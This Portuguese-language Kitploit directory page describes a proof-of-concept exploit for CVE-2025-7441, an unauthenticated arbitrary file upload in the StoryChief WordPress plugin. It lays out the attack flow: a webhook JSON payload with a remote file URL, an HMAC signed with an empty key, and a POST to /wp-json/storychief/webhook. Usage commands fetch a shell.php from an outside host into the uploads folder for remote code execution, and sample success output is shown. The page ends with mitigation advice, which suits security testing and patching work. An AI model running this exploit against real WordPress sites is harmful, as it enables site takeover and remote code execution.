Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-7441 — StoryChief <= 1.0.42 - Upload arbitrário de arquivos sem autenticação | Kitploit
Ferramentas/GitHubGitHub/anothersec/cve-2025-7441
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubanothersec/cve-2025-7441

CVE-2025-7441

StoryChief <= 1.0.42 - Upload arbitrário de arquivos sem autenticação

Ver Repositório
3142há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-7441

CVE-2025-7441 StoryChief 1.0.42 - Upload Arbitrário de Arquivos

Vulnerabilidade (CVE-2025-7441) - Resumo Técnico

  • Componente afetado: Plugin StoryChief para WordPress
  • Tipo de vulnerabilidade: Upload arbitrário de arquivos não autenticado
  • Endpoint vulnerável: /wp-json/storychief/webhook
  • Causa raiz: O plugin aceita um payload JSON de webhook que contém uma URL (em data.featured_image.data.sizes.full) e realiza uma requisição HTTP GET no servidor para essa URL sem validação suficiente (sem lista de permissão de domínios, verificações de MIME/conteúdo insuficientes, e os arquivos são salvos em caminhos de upload públicos).
  • Impacto: Um atacante não autenticado pode fazer o servidor buscar e persistir conteúdo controlado pelo atacante no diretório de uploads do WordPress (ex.: wp-content/uploads/YYYY/MM/<filename>). Se o arquivo enviado puder ser interpretado/executado pelo servidor (por exemplo, um arquivo PHP e o servidor permitir execução PHP ali), isso leva à execução remota de código (RCE) e comprometimento total do site.
  • CVSS (exemplo): 9.8 (Crítico) — a gravidade depende da configuração de hospedagem e das permissões de execução.

  • Sobre este PoC (CVE-2025-7441)

    Este script automatiza o fluxo típico de verificação de exploração da vulnerabilidade:

    1. Construir um payload JSON de webhook que coloca uma URL de arquivo remoto em data.featured_image.data.sizes.full.
    2. Calcular uma assinatura HMAC-SHA256 sobre o payload (o script calcula usando uma chave vazia por padrão) e armazená-la em meta.mac.
    3. Enviar o payload via POST para <site_url>/wp-json/storychief/webhook.
    4. Verificar se o arquivo buscado está presente no caminho de upload esperado:

    <site_url>/wp-content/uploads///

    Se o arquivo responder com HTTP 200, o script reporta sucesso; caso contrário, ele exibe <failed to upload>.

    O script inclui as seguintes flags: --file-url, --verbose, --use-curl e --retries.

    Uso

    python3 CVE-2025-7441.py <site_url>

    Argumento posicional

    • <site_url> — URL base do site alvo. Exemplo: http://127.0.0.1:5000/ ou https://target.example/

    Flags

    • --file-url — Substituir a URL de arquivo remoto padrão usada pelo PoC. Padrão: URL raw do GitHub de exemplo codificada. Exemplo: --file-url https://127.0.0.1:5000/zip.php
    • --verbose — Habilitar saída detalhada (imprime detalhes da requisição/resposta e progresso da verificação).
    • --use-curl — Usar subprocesso curl para enviar o POST (modo de fallback). Requer curl instalado.
    • --retries — Número de tentativas para verificar o caminho de upload esperado para o arquivo. Padrão: 1. Use por exemplo --retries 5 para consultar várias vezes.

    Exemplo de comando

    root@kitploit:~
    python3 CVE-2025-7441.py http://127.0.0.1:5000/
    

    Especificar uma URL de arquivo remoto personalizada

    root@kitploit:~
    python3 CVE-2025-7441.py http://127.0.0.1:5000/  --file-url https://example.com/shell.php
    

    Saída detalhada e múltiplas verificações

    root@kitploit:~
    python3 CVE-2025-7441.py http://127.0.0.1:5000/ --file-url https://example.com/shell.php --verbose --retries 5
    

    Usar curl para enviar o POST

    root@kitploit:~
    python3 CVE-2025-7441.py http://127.0.0.1:5000 --file-url https://example.com/shell.php --use-curl --verbose
    

    output:

    root@kitploit:~
    [*] Target: https://127.0.0.1:5000
    [*] file_url: https://127.0.0.1:5000/ZIP.php
    [*] retries: 3
    [*] use_curl: False
    [+] computed hmac : 3f2a9b0e4d6c5a1f0b9d6e3c2a1f4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1
    [*] Sending POST via requests...
    [*] POST status: 200
    [*] Response body (truncated):
    {"permalink":"/wp-content/uploads/2025/10/ZIP.php","id":12345}
    [*] Checking (1/3): https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php
    [+] success! [+]
    https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php
    

    Mitigação

    Mitigação & Remediação Curto prazo:

    Atualizar o StoryChief para uma versão corrigida imediatamente quando disponível. Bloquear ou restringir /wp-json/storychief/webhook via WAF ou regras do servidor. Restringir buscas de saída do servidor ou tráfego de egresso para domínios não confiáveis.

    Orientação para desenvolvedores:

    Validar tipos e conteúdos de arquivos após qualquer busca remota; verificar imagens usando analisadores seguros e rejeitar arquivos inválidos. Exigir autenticação para webhooks que causam downloads ou criação de arquivos no servidor. Garantir que a verificação HMAC/assinatura seja implementada e aplicada. Armazenar conteúdo enviado fora da raiz web ou desabilitar a execução de arquivos enviados em wp-content/uploads

    Baixar ferramenta